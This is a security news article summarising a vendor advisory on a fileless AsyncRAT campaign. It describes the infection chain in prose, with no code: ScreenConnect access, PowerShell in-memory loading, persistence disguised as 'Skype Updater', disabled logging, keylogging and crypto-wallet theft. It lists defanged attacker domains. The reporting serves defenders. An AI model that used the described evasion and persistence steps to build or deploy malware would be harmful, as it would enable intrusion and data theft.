Cybersecurity researchers have uncovered a sophisticated fileless malware campaign that leverages legitimate system tools to deliver a potent remote access Trojan (RAT). By executing entirely in memory, this type of malware bypasses traditional disk-based detection, making it difficult to detect, analyze, or remove.

Initial Access Through Compromised Remote Tools

According to a LevelBlue advisory, the attack began with a compromised ScreenConnect client, a widely used remote access platform. Threat actors established an interactive session via the domain relay.shipperzone[.]online, associated with unauthorized ScreenConnect deployments.

During the session, a VBScript named Update.vbs executed via WScript, which triggered a PowerShell command to download two payloads: logs.ldk and logs.ldr. These files were saved to C:\Users\Public\ but never written as executables on disk. Instead, they were loaded directly into memory using reflection, a hallmark of fileless malware.

The first payload was converted into a byte array, while the second executed directly. Encoded data retrieved from the web was decoded in memory and invoked a .NET assembly to run the attack.

AsyncRAT Infection Chain

A first-stage .NET assembly, Obfuscator.dll, acts as the launcher for the AsyncRAT infection chain. LevelBlue’s analysis identified three main components:

• Class A – Initializes the runtime environment.
• Class Core – Ensures persistence through a scheduled task disguised as “Skype Updater” and loads additional payloads.
• Class Tafce5 – Disables Windows security logging, patches script scanning, and resolves APIs dynamically.

This modular architecture allows the malware to evade detection while preparing the system for the RAT payload.

AsyncRAT Capabilities

The RAT itself, executed via AsyncClient.exe, functions as a command-and-control (C2) engine, maintaining persistent access, performing system reconnaissance, and executing commands provided by attackers. Key features include:

• AES-256 decryption of embedded configuration, including C2 domains (e.g., 3osch20[.]duckdns[.]org), infection flags, and target directories (%AppData%).
• TCP-based communication using custom packet protocols for command dispatch.
• Data exfiltration, including OS details, privilege levels, antivirus status, active windows, and browser extensions such as MetaMask and Phantom.
• Keylogging with context capture and persistence through scheduled tasks.

The advisory notes:

“Breaking down these elements allows us to understand how the malware maintains persistence, dynamically loads payloads, and exfiltrates sensitive data such as credentials, clipboard contents, and browser artifacts. These findings support targeted detection and endpoint hardening based on observed behaviors.”

Implications for Organizations

This incident demonstrates the growing sophistication of fileless attacks, which can bypass traditional security measures. Organizations should prioritize endpoint monitoring, behavioral analysis, and proactive hardening to defend against memory-resident malware that exploits legitimate system tools.

Source: https://www.infosecurity-magazine.com/news/fileless-malware-deploys-advanced